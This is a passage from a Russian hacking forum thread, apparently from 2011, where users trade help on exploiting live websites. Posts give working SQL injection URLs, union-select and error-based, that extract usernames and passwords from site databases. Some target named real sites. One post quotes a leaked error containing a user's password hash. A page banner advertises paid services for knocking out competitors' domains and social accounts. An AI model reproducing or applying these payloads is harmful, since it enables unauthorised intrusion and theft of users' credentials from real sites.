Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1848 из 2438

1848

Опции темы

Поиск в этой теме

Опции просмотра

#18471

03.11.2011, 15:07

Boolean

Участник форума

Регистрация: 05.09.2010

Сообщений: 147

С нами: 8255126

Репутация: 78

Попробуй указать базу данных этой таблицы.

#18472

03.11.2011, 15:08

bbugz

Новичок

Регистрация: 21.07.2011

Сообщений: 0

С нами: 7795766

Репутация: 0

Всем Привет.Вытянул из базы логины и пароли юзеров,патюсь залогинится выдет такую ошибку

Цитата:

Сообщение от None

Fatal error: Uncaught exception 'Exception' with message '_doQuery: [Error message: Could not execute statement] [Last executed query: SELECT logged_in FROM users WHERE username = 'j' AND password = '5eb59a1c45ec8d0eafe705c45aa15ce1'] [Native code: 1054] [Native message: Unknown column 'logged_in' in 'field list'] ' in /home/marketing/emaxxtech.com/includes/functions.php:6 Stack trace: #0 /home/marketing/emaxxtech.com/login.php(14): error_handler(Object(MDB2_Error)) #1 {main} thrown in /home/marketing/emaxxtech.com/includes/functions.php on line 6

что это значит и можно ли как-то использовать?

p.s. только учусь по данной теме ,поэтому не судим строго,очень прошу..

#18473

03.11.2011, 15:13

s000r

Новичок

Регистрация: 28.09.2011

Сообщений: 15

С нами: 7696406

Репутация: 0

Цитата:

Сообщение от Boolean

Попробуй указать базу данных этой таблицы.

аналогичная ситуация...

#18474

03.11.2011, 15:17

Boolean

Участник форума

Регистрация: 05.09.2010

Сообщений: 147

С нами: 8255126

Репутация: 78

Цитата:

Сообщение от s000r

аналогичная ситуация...

Показывай ссылку, или в пм.

upd: все, решили, проблема была как я и сказал, в указателе на базу данных с этой таблицей.

#18475

03.11.2011, 20:10

Einstein

Новичок

Регистрация: 24.10.2011

Сообщений: 9

С нами: 7658966

Репутация: 0

Люди помогите с sql

Имеется SQL инъекция.

www.xxx.xx/title.php?id=-32+union+select+1

версия: 5.1.49

нашел таблицу members

в таблице есть колонки: username, password

пишу запрос:

www.xxx.xx/title.php?id=-32+union+select+username from members limit 0,1 ---- не выводится ничего и при limit 1,1 и 1,2

но при:

www.xxx.xx/title.php?id=-32+union+select+password from members limit 0,1 ---все пароли выводятся

В чем может быть проблема?

#18476

03.11.2011, 20:39

tabletkO

Познающий

Регистрация: 03.11.2011

Сообщений: 83

С нами: 7644566

Репутация: 11

Einstein,

может просто нет username-ов?) Ссылку кинь в ПМ.

P.S. Попробуй UNHEX(HEX(username))

www.xxx.xx/title.php?id=-32+union+select+UNHEX(HEX(username))+from+members+ limit+0,1+--+

#18477

03.11.2011, 21:41

Einstein

Новичок

Регистрация: 24.10.2011

Сообщений: 9

С нами: 7658966

Репутация: 0

ай-яй.

Все получилось помогло вот что:

www.xxx.xx/title.php?id=-34+union+select+concat(username,char(58),password) ...---b все вывелось.

tabletkO спасибо, что откликнулся =)

#18478

04.11.2011, 00:59

omg_it_glowZ

Познающий

Регистрация: 29.01.2011

Сообщений: 38

С нами: 8044886

Репутация: -2

Цитата:

Сообщение от Kuteke

NetDevilz SQL Scanner в гугл пропиши

не интересуют программы, которые просто ищут ошибку при подстановке " ' ".

Это ты видать не заметил, да?

#18479

04.11.2011, 01:47

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

С нами: 9650336

Репутация: 662

Проблемка...

При выводе инфы из БД пишет Subquery returns more than 1 row

запрос:

?id=1+and(select+1+from(select+count(*),concat((se lect+2+from+users+limit+0,1),floor(rand(0)*2))x+fr om+users+group+by+x)a)+and+1=1

#18480

04.11.2011, 16:58

vaddd

Познающий

Регистрация: 06.01.2009

Сообщений: 69

С нами: 9128075

Репутация: 3

http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123

как такое крутить? почему при order by 123 нет ошибки?

Страница 1848 из 2438

1848

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход